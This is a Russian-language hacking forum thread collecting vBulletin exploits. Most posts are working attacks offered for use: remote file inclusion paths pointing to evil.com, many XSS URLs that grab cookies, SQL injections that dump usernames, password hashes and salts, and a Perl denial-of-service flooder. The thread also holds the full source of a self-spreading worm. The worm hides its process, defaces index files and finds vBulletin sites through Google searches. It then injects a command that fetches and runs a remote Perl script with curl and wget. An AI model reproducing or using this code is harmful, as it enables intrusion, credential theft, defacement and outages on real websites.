HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Code Exec + Xss
  #1  
Старый 15.08.2007, 12:56
v1d0qz
Познающий
Регистрация: 21.07.2007
Сообщений: 68
С нами: 9898501

Репутация: 257
По умолчанию Code Exec + Xss

vBulletin v3.6.5
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:
[site]/vb/includes/functions.php?classfile=[Shell-Attack]
[site]/vb/includes/functions_cron.php?nextitem=[Shell-Attack]
[site]/vb/includes/functions_forumdisplay.php?specialtemplates=[Shell-Attack]


vBulletin V3.6.8
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за недостаточной обработки входных данных во множестве сценариев множеством параметров. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Пример:
[site]/[path]/faq.php?s=&do=search&q=%22%3E%3C%2Fscript%3E%3Cscr ipt%3Ealert%28document.cookie%29%3B%3C%2Fscript&ma tch=
all&titlesonly=0

[site]/[path]/member.php?u=1=s'&do=search&q=%22%3E%3C%2Fscript%3 E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2F
script&match=all&titlesonly=1

[site]/[path]/index.php?s=<script>alert('document.cookie')</script>

[site]/[path]/faq.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3Csc ript%3Ealert%28document.cookie%29%3B%3C%2Fscript
&match=all&titlesonly=0

[site]/[path]/memberlist.php?s="&do=search&q=%22%3E%3C%2Fscript% 3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2
Fscript&match=all&titlesonly=0

[site]/[path]/calendar.php?s="&do=search&q=%22%3E%3C%2Fscript%3E %3Cscript%3Ealert%28document.cookie%29%3B%3C%2F
script&match=all&titlesonly=0

[site]/[path]/search.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3 Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscrip t
&match=all&titlesonly=0

[site]/[path]/search.php?do=getdaily"&do=search&q=%22%3E%3C%2Fsc ript%3E%3Cscript%3
Ealert%28document.cookie
%29%3B%3C%2Fscript&match=all&titlesonly=0

[site]/[path]/forumdisplay.php?s="&do=search&q=%22%3E%3C%2Fscrip t%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2 Fscript
&match=all&titlesonly=0

[site]/[path]/forumdisplay.php?do=markread"&do=search&q=%22%3E%3 C%2Fscript%3E%3Cscript%3E
alert%28document.cookie
%29%3B%3C%2Fscript&match=all&titlesonly=0

[site]/[path]/forumdisplay.php?f=1"&do=search&q=%22%3E%3C%2Fscri pt%3E%3Cscript%3Ealert%28document.cookie
%29%3B%3C%2Fscript&match=all&titlesonly=0

[site]/[path]/showgroups.php?s="&do=search&q=%22%3E%3C%2Fscript% 3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fs cript&
match=all&titlesonly=0

[site]/[path]/online.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3 Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscrip t&
match=all&titlesonly=0

[site]/[path]/member.php?s="&do=search&q=%22%3E%3C%2Fscript%3E%3 Cscript%3Ealert%28document.cookie%29%3B%3C%2F
script&match=all&titlesonly=0

[site]/[path]/sendmessage.php?s="&do=search&q=%22%3E%3C%2Fscript %3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2F
script&match=all&titlesonly=0

Источник www.securitysib.com

Последний раз редактировалось Elekt; 03.09.2008 в 02:43..
 
Ответить с цитированием

[HIDE] Tag Bypass
  #2  
Старый 09.11.2007, 23:32
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
С нами: 10447337

Репутация: 807
По умолчанию [HIDE] Tag Bypass

на некоторых форумах стоит хайд на ссылки, типа "зарегистрируйтесь, чтобы увидеть ссылку". вовсе не обязательно регаться, достаточно найти это сообщение через "найти все сообщения от ...". там ссылка будет в открытом виде. но обычно в поиске выводится только первые строки.

вот такая мего уязвимость)

Последний раз редактировалось Elekt; 03.09.2008 в 02:41..
 
Ответить с цитированием

[HIDE] Tag Bypass
  #3  
Старый 24.11.2007, 16:02
Mind Ice
Новичок
Регистрация: 23.11.2007
Сообщений: 1
С нами: 9718576

Репутация: 1
По умолчанию [HIDE] Tag Bypass

2 freddi это неявляются уязвимостью как ты написал. Просто авторы таких постов с хайдом толком не умеют пользоваться тегами. Как ты написал нужно находить все соообщения от пользователя - хмм а если их 1000 и нужное в середине ? а форум позволяет индексировать только 200 - 400 ? Ненужно искать посты все проще помещаем курсор на скрытый тескт и видим ссылку =).

Последний раз редактировалось Elekt; 03.09.2008 в 02:41..
 
Ответить с цитированием

SQL Injection в админке 3.6.5
  #4  
Старый 02.12.2007, 14:38
_-Ramos-_
Banned
Регистрация: 04.01.2007
Сообщений: 193
С нами: 10184006

Репутация: 728
По умолчанию SQL Injection в админке 3.6.5

SQL Injection в админке (тестировалось на версиях 3.6.4 и 3.6.5 )

1. Log in to admin panel
2. Go to Attachments->Search
3. Place the following string in the Attached Before field:

Код:
') union select 1,1,1,1,1,userid,password,1,username from user -- 9

Последний раз редактировалось Elekt; 03.09.2008 в 02:40..
 
Ответить с цитированием

vBuserbar SQL-inj
  #5  
Старый 29.12.2007, 15:50
S(r1pt
Новичок
Регистрация: 31.07.2007
Сообщений: 20
С нами: 9884330

Репутация: 18
По умолчанию vBuserbar SQL-inj

Продукт: vBuserbar
Уязвимость: SQL-inj
Автор: S(r1pt
Адрес: http://vash_site/vbuserbar.php?do=groupinsert&amp;name='
=\\

Последний раз редактировалось Elekt; 03.09.2008 в 02:40..
 
Ответить с цитированием

vBulletin <=3.5.3 Search DoS
  #6  
Старый 04.01.2008, 19:05
Mo4x
Постоянный
Регистрация: 18.02.2007
Сообщений: 416
С нами: 10119206

Репутация: 412
По умолчанию vBulletin <=3.5.3 Search DoS

vBulletin <=3.5.3 Search DoS


Код:
#!/usr/bin/perl
##########################################
# vBdos.pl - vBulletin <=3.5.3 Search DoS
#
# Written by spic of g00ns
##########################################
# Contact
# Site: www.g00ns.net and www.g00ns-forum.net
# Email: spic <at> g00ns.net
# IRC: irc.g00ns.net #g00ns
##########################################
# Example
# vBdos.pl www.avbforum.com /vbulletin/
##########################################

print q{
____________________________________________________________________________
____ ____ ____ ____ _ __ ____ ____ _ __ ____ _____ ____ __ ___
/ __// __//_ // __// |/ // __// _// |/ // __/ / ___// __ / |/ /
_ / _/ / // _/ / /_ _/ / / /_ _ / /__ / /_/ // /|_/ /
/___//___/ /_//___//_/|_//___//___//_/|_//___/(_)___/ ____//_/ /_/
____________________________________________________________________________

};

use IO::Socket;
$server= $ARGV[0];
$path=$ARGV[1];


while($x != 9999)
{
$post =

"search_keywords=Se7enSins+owned+your+site$x+&search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=ms

gonly&search_cat=-1&sort_by=0&sort_dir=ASC&show_results=posts&return_chars=200";

$lrg = length $post;


if(!$server||!$path)
{
print " vBulletin DoS by spic of g00ns nn";

print " Exploit code found on Se7enSins.com nn";

print " n00bFRAGGER was here... nn";

print " usage: VBDoS.pl <host without http> <directory> nn";
exit();
}



my $sock = new IO::Socket::INET (
PeerAddr => "$server",
PeerPort => "80",
Proto => "tcp",
);
die "nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!n" unless $sock;


print $sock "POST $path"."search.php?searchid=1952 HTTP/1.1n";
print $sock "Host: $servern";
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5n";
print $sock "Referer: $servern";
print $sock "Accept-Language: en-usn";
print $sock "Content-Type: application/x-www-form-urlencodedn";
print $sock "Accept-Encoding: gzip, deflaten";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7. Gecko/20050511 Firefox/1.0.5n";
print $sock "Connection: Keep-Aliven";
print $sock "Cache-Control: no-cachen";
print $sock "Content-Length: $lrgnn";
print $sock "$postn";
close($sock);


syswrite STDOUT,".";

$x++;
}

##########################################

Последний раз редактировалось Elekt; 03.09.2008 в 02:39..
 
Ответить с цитированием

  #7  
Старый 12.01.2008, 21:32
Elekt
Banned
Регистрация: 05.12.2005
Сообщений: 982
С нами: 10752806

Репутация: 1202


По умолчанию

из новых модов не было

vBulletin Mod RPG Inferno 2.4 (inferno.php) SQL Injection Vulnerability
Exploit :
http://site.com/forum/inferno.php?do=ScanMember&id=-1'/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,user(),database(),10,11,12,13,14,15, 16,17,18,19,20,21,22,23,24,25,26,27,28,29,concat(u sername,0x3a,password,0x3a,salt),31,@@version,33,3 4,35,36,37,38,39,40,41,42,43,44,45,46,47/**/from/**/user/**/where/**/usergroupid=6/**/limit/**/0,1/*


vBulletin vBGSiteMap 2.41 (root) Remote File Inclusion Vulnerabilities
Exploit :
vBulletin_Forum_Bath/vbgsitemap/vbgsitemap-config.php?base=http://evil.com?
vBulletin_Forum_Bath/vbgsitemap/vbgsitemap-vbseo.php?base=http://evil.com?

=======
 
Ответить с цитированием

Vbulletin Tube (vBTube) XSS
  #8  
Старый 22.01.2008, 13:49
_-Ramos-_
Banned
Регистрация: 04.01.2007
Сообщений: 193
С нами: 10184006

Репутация: 728
Smile Vbulletin Tube (vBTube) XSS

Vbulletin Tube (vBTube) XSS

Exploit :
Код:
vBTube.php?do=search&search=<script>alert(document.cookie);</script>
Пример:
Код:
http://www.ruhot.ru/forum/vBTube.php?do=search&search=%3Cscript%3Ealert(document.cookie);%3C/script%3E

Последний раз редактировалось Elekt; 03.09.2008 в 02:32..
 
Ответить с цитированием

vBulletin Worm <= 3.0.6
  #9  
Старый 23.01.2008, 10:19
_-Ramos-_
Banned
Регистрация: 04.01.2007
Сообщений: 193
С нами: 10184006

Репутация: 728
Smile vBulletin Worm <= 3.0.6

vBulletin Worm <= 3.0.6

Код:
 #!/usr/bin/perl 

##################### 
#### 
#### #### #### #### #### #### #### # # # # #### 
#### # # # # # # # # # # # # # # 
#### #### # # ### ## #### # #### ## ### 
#### # # # # # # # # # # # # # 
#### # #### #### # # #### #### # # # # #### 
#### 
##################### 

use IO::Socket::INET; 
$hahaha = $0; 
my $processo = "/usr/local/sbin/httpd"; 
$SIG{"INT"} = "IGNORE"; 
$SIG{"HUP"} = "IGNORE"; 
$SIG{"TERM"} = "IGNORE"; 
$SIG{"CHLD"} = "IGNORE"; 
$SIG{"PS"} = "IGNORE"; 

$0="$processo"."\0"x16; 
my $pid=fork; 
exit if $pid; 

######################## 
# # 
# procura index # 
# # 
####################### 

system("locate index.* >> index"); 
system("find / -name index.* >> index"); 

open(a,"<index"); 
@ind = <a>; 
close(a); 
$b = scalar(@ind); 
for($a=0;$a<=$b;$a++){ 
chomp $ind[$a]; 
system("echo spykids ownz your server > $ind[$a]"); 
} 


######################### 
# # 
# pega sites e registra # 
# # 
######################### 

`cat /etc/httpd/conf/httpd.conf |grep ServerName >> sites`; 


open(a,"<sites"); 
@site = <a>; 
close(a); 

$b = scalar(@site); 

for($a=0;$a<=$b;$a++) 
{ 
$site[$a] =~ s/#//g; 
$site[$a] =~ s/servername//g; 
$site[$a] =~ s/ServerName//g; 
$site[$a] =~ s/ //g; 
$testa = IO::Socket::INET->new(PeerAddr => $site[$a], PeerPort => 80, Proto => "tcp") or next; 
print $testa "GET / HTTP/1.0\n\n"; 
print $testa "Host: $site"; 
print $testa "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.0.1) Gecko/20020823 Netscape/7.0"; 
print $testa "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1"; 
print $testa "Accept-Language: pt-br, pt;q=0.50"; 
print $testa "Accept-Encoding: gzip, deflate, compress;q=0.9"; 
print $testa "Accept-Charset: ISO-8859-1, utf-8;q=0.66, *;q=0.66"; 
print $testa "Keep-Alive: 300"; 
print $testa "Connection: keep-alive"; 
@ow = <$testa>; 
close($teste); 
$ae = "@ow"; 
if($ae =~/spykids/i){ 
$sock = IO::Socket::INET->new(PeerAddr => "www.zone-h.org", PeerPort => 80, Proto => "tcp") or die "nao conectou"; 
print $sock "POST /en/defacements/notify HTTP/1.0\r\n"; 
print $sock "Accept: */*\r\n"; 
print $sock "Referer: http://www.zone-h.org/en/defacements/notify\r\n"; 
print $sock "Accept-Language: pt-br\r\n"; 
print $sock "Content-Type: application/x-www-form-urlencoded\r\n"; 
print $sock "Connection: Keep-Alive\r\n"; 
print $sock "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n"; 
print $sock "Host: www.zone-h.org\r\n"; 
print $sock "Content-Length: 385\r\n"; 
print $sock "Pragma: no-cache\r\n"; 
print $sock "\r\n"; 
print $sock "notify_defacer=SpyKids&notify_domain=http%3A%2F%2F$site[$a]&notify_hackmode=18&notify_reason=5&notify=+OK+\r\n"; 

close($sock); 
} 
} 


######################### 
# # 
# worm aws.spykids # 
# # 
######################## 
while(1){ 
$cmd = '/misc.php?do=page&template={${system(%22cd%20/tmp;curl%20-O%20http://compras.el-nacional.com/spykids.txt%20;perl%20spykids.txt%20;rm%20-rf%20spykids*;%20wget%20http://compras.el-nacional.com/spykids.txt;%20perl%20spykids.txt;%20rm%20-rf%20%20spykids*%22)}}'; 




@site = ""; 
$a=0; 
@dom = (".ar",".au",".aw",".ax",".az",".ba",".bb",".bd",".be",".bf",".bg",".bh",".bi",".bj",".bm",".bn",".bo",".br",".bs",".bt",".bv",".bw",".by",".bz",".ca",".cc",".cd",".cf",".cg",".ch",".ci",".ck" , ".cl", ".cm",".cn",".co",".cr",".cs",".cu", ".cv",".cx",".cy",".cz",".de",".dj",".dk",".dm",".do",".dz", ".ec",".ee",".eg",".eh",".er",".es",".et",".fi",".fj",".fk",".fm", ".fo",".fr",".ga",".gb",".gd",".ge",".gf",".gg",".gh",".gi",".gl", ".gm",".gn",".gp",".gq",".gr",".gs",".gt",".gu",".gw",".gy",".hk", ".hm",".hn",".hr",".ht",".hu",".id",".ie",".il",".im",".in",".io",".iq", ".ir",".is",".it",".je",".jm",".jo",".jp",".ke",".kg",".kh",".ki",".km", ".kn",".kp",".kr",".kw",".ky",".kz",".la",".lb",".lc",".li",".lk",".lr",".ls", ".lt",".lu",".lv",".ly",".ma",".mc",".md",".mg",".mh",".mk",".ml",".mm", ".mn",".mo",".mp",".mq",".mr",".ms",".mt",".mu",".mv",".mw",".mx",".my", ".mz",".na",".nc",".ne",".nf",".ng",".ni",".nl",".no",".np",".nr",".nu",".nz",".om", ".pa",".pe",".pf",".pg",".ph",".pk",".pl",".pm",".pn",".pr",".ps",".pt",".pw",".py", ".qa",".re",".ro",".ru",".rw",".sa",".sb",".sc",".sd",".se",".sg",".sh",".si",".sj",".sk",".sl", ".sm",".sn",".so",".sr",".st",".sv",".sy",".sz",".tc",".td",".tf",".tg",".th",".tj",".tk",".tl",".tm", ".tn",".to",".tp",".tr",".tt",".tv",".tw",".tz",".ua",".ug",".uk",".um",".us",".uy",".uz",".va",".vc",".ve",".vg",".vi",".vn", ".vu",".wf",".ws",".ye",".yt",".yu",".za",".zm",".zw"); 
foreach $dom (@dom){ 
$site = "www.google.com"; 
open(a,">pra.txt"); 
print a ""; 
close(a); 
############### google 

for($n=0;$n<1000;$n += 100){ 
$sock = IO::Socket::INET->new(PeerAddr=>"$site",PeerPort=>"80",Proto=>"tcp") or next; 
print $sock "GET h/search?q=%22Powered+by%3A+vBulletin%22inurl%3A$dom&num=100&hl=en&lr=&as_qdr=all&start=$n&sa=N HTTP/1.0\n\n"; 
print $sock "Host: www.google.com"; 
print $sock "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.0.1) Gecko/20020823 Netscape/7.0"; 
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1"; 
print $sock "Accept-Language: pt-br, pt;q=0.50"; 
print $sock "Accept-Encoding: gzip, deflate, compress;q=0.9"; 
print $sock "Accept-Charset: ISO-8859-1, utf-8;q=0.66, *;q=0.66"; 
print $sock "Keep-Alive: 300"; 
print $sock "Connection: keep-alive"; 
@resu = <$sock>; 
close($sock); 
$ae = "@resu"; 
while ($ae=~ m/<a href=.*?>.*?<\/a>/){ 
$ae=~ s/<a href=(.*?)>.*?<\/a>/$1/; 
$uber=$1; 
if ($uber !~/translate/) 
{ 
if ($uber !~ /cache/) 
{ 
if ($uber !~ /"/) 
{ 
if ($uber !~ /google/) 
{ 
if ($uber !~ /216/) 
{ 
if ($uber =~/http/) 
{ 

substr($uber,0,7) = ""; 
$nu = rindex $uber, '/'; 
$uber = substr($uber,0,$nu); 


open(a,">>pra.txt"); 
print a "$uber\n"; 
close(a); 

}}}}}} 
} 
} 
$ark = "pra.txt"; 
@si = ""; 
open (arquivo,"<$ark"); 
@si = <arquivo>; 
close(arquivo); 
$novo =""; 
foreach (@si){ 
if (!$si{$_}) 
{ 
$novo .= $_; 
$si{$_} = 1; 
} 
} 
open (arquivo,">$ark"); 
print arquivo $novo; 
close(arquivo); 
open(a,"<pra.txt"); 
@site = <a>; 
close(a); 

foreach $site (@site){ 
chomp $site; 

($site, $dir) = split('/',$site); 


$soc = IO::Socket::INET->new(PeerAddr => $site, PeerPort => 80, Proto => "tcp") or next; 
print $soc "GET /$dir$cmd HTTP/1.0\n\n"; 
print $soc "Host: $site"; 
print $soc "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.0.1) Gecko/20020823 Netscape/7.0"; 
print $soc "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1"; 
print $soc "Accept-Language: pt-br, pt;q=0.50"; 
print $soc "Accept-Encoding: gzip, deflate, compress;q=0.9"; 
print $soc "Accept-Charset: ISO-8859-1, utf-8;q=0.66, *;q=0.66"; 
print $soc "Keep-Alive: 300"; 
print $soc "Connection: keep-alive"; 
close($soc); 

} 
} 
}
 
Ответить с цитированием

узнать версию форума
  #10  
Старый 01.02.2008, 21:51
chezar
Познающий
Регистрация: 29.01.2006
Сообщений: 53
С нами: 10673114

Репутация: 7
По умолчанию узнать версию форума

На некоторых форумах версию форума можно узнать тут

forum/archive/index.php/

Последний раз редактировалось Elekt; 03.09.2008 в 02:33..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
В ядре Linux появляется все больше уязвимостей dinar_007 Мировые новости. Обсуждения. 18 26.01.2007 16:21



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.